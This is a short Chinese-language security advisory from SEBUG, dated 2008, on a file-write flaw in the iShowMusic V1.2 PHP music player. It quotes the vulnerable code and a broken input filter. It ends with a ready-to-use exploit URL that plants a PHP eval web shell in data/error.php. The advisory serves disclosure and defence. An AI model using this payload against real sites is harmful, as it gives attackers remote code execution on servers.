iShowMusic V1.2
iShowMusic V1.2 写入shell漏洞
SEBUG-ID:3604
Published:2008-07-12
Vulnerable:
Discription:
iShow Music 是一套基本于PHP+TXT的在线音乐播放程序。程序采用文本数据存储方式,无需MYSQL数据库支持,同时程序代码与界面模板分离,方便你的音乐网站界面修改。
在error.php 12-26行
elseif ($_POST['action']=="save"){
$cknumon && GdConfirm($gdcode);
if(empty($id)) {
Showmsg("no","你还未选择歌曲呢!","返回重新填写","javascript:history.back(-1)"); exit;}
elseif(empty($_POST['user'])) {
Showmsg("no","你还没写名字呢!","返回重新填写","javascript:history.back(-1)"); exit;}
else{
$user=safeconvert($user);
$line="$user|$songname|$id|$errmsg|$timestamp|\n";
$e="$datadir/error.php";
writetofile($e,$line,"a+");
Showmsg("yes","提交成功,谢谢您的支持!","关闭本页","javascript:window.close()"); exit;
}
在global.php 27-34行
foreach($_POST as $_key=>$_value){
$_POST[$_key]=str_replace(array('|','$','..'),array
('|','$','..'),$_POST[$_key]);
!ereg("^\_",$_key) && !$$_key && $$_key=$_POST[$_key];
}
foreach($_GET as $_key=>$_value){
$_GET[$_key]=str_replace(array('|','$','..'),array
('|','$','..'),$_GET[$_key]);
!ereg("^\_",$_key) && !$$_key && $$_key=$_GET[$_key];
}
这段代码是允许在register_globals在off的情况下工作
程序作者的意图应该是把post和get提交的值过滤一下吧,这里手误把$_POST[$_key]给过滤了.
导致失去了这段代码本来的作用.
function writetofile($file_name, $data, $method = "w")
{
$filenum = fopen($file_name, $method);
flock($filenum, LOCK_EX);
$file_data = fwrite($filenum, $data);
fclose($filenum);
return $file_data;
}
这个函数也没有任何过滤就把$data写进去了Exploit:
[www.sebug.net]
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
http://www.xxx.com/error.php?errid=1&errtitle=<?eval($_POST[wst]);?> 然后提交一下你就能获得一个shell在 http://www.xxx.com/data/error.php ($datadir默认为/data/,建议用这程序的管理员把这个默认值和文 件夹改名,呵呵)
SEBUG Solution:
// sebug.net [2008-07-12]